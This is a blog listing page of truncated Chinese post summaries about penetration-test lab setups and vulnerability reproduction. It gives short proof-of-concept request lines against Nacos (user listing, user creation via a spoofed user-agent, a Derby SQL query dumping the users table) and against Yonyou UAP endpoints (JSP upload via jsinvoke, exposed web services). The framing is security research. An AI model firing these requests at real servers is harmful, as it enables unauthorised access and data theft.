摘要: 一、环境搭建 注意:靶机通用密码: 1qaz@WSX 这里设置两个网卡 三台虚拟机配置如下: kali机:192.168.230.131(VMnet8 网卡随机分配的IP) PC机:192.168.230.201(外网ip),10.10.10.201(内网ip) DC机:10.10.10.10(域控 阅读全文
posted @ 2024-07-12 14:29 都吃泡芙 阅读(247) 评论(0) 推荐(0)
摘要: 一、环境搭建 说明:虚拟机所有初始密码都为hongrisec@2019(后面需要改密码,自己设置) 这里设置两个网卡,配置如下: 三台虚拟机以及攻击机ip如下: kali机:192.168.230.131(VMnet8 网卡随机分配的IP) win7:192.168.230.153**(外网ip)* 阅读全文
posted @ 2024-07-06 16:34 都吃泡芙 阅读(288) 评论(0) 推荐(0)
摘要: 影响范围: Nacos <= 2.0.0-ALPHA.1 漏洞复现: 检测漏洞是否存在 POC: /nacos/v1/auth/users?pageNo=1&pageSize=4 接下来可以尝试创建用户,useragent写成Nacos-Server POC: POST /nacos/v1/auth 阅读全文
posted @ 2024-07-01 09:17 都吃泡芙 阅读(394) 评论(0) 推荐(0)
摘要: 影响范围: 0.1.0 <= Nacos <= 2.2.0 漏洞复现: POC: POST /nacos/v1/auth/users/login HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r 阅读全文
posted @ 2024-06-28 15:29 都吃泡芙 阅读(105) 评论(0) 推荐(1)
摘要: 漏洞复现: POC: /nacos/v1/cs/ops/derby?sql=select%20%2a%20from%20users 阅读全文
posted @ 2024-06-27 19:32 都吃泡芙 阅读(559) 评论(0) 推荐(0)
摘要: 漏洞复现: 首先上传jsp POC: POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l 阅读全文
posted @ 2024-06-26 16:45 都吃泡芙 阅读(149) 评论(0) 推荐(0)
摘要: 漏洞复现: POC: /uapws/index.jsp 阅读全文
posted @ 2024-06-26 16:30 都吃泡芙 阅读(70) 评论(0) 推荐(0)
摘要: 漏洞复现: POC: /uapws/service 阅读全文
posted @ 2024-06-26 16:28 都吃泡芙 阅读(61) 评论(0) 推荐(0)
摘要: 漏洞复现: POC: /uapws/service/nc.uap.oba.update.IUpdateService?wsdl 阅读全文
posted @ 2024-06-26 16:26 都吃泡芙 阅读(143) 评论(0) 推荐(0)
摘要: 漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 阅读全文
posted @ 2024-06-26 16:21 都吃泡芙 阅读(138) 评论(0) 推荐(0)
//雪花飘落效果 //雪花飘落效果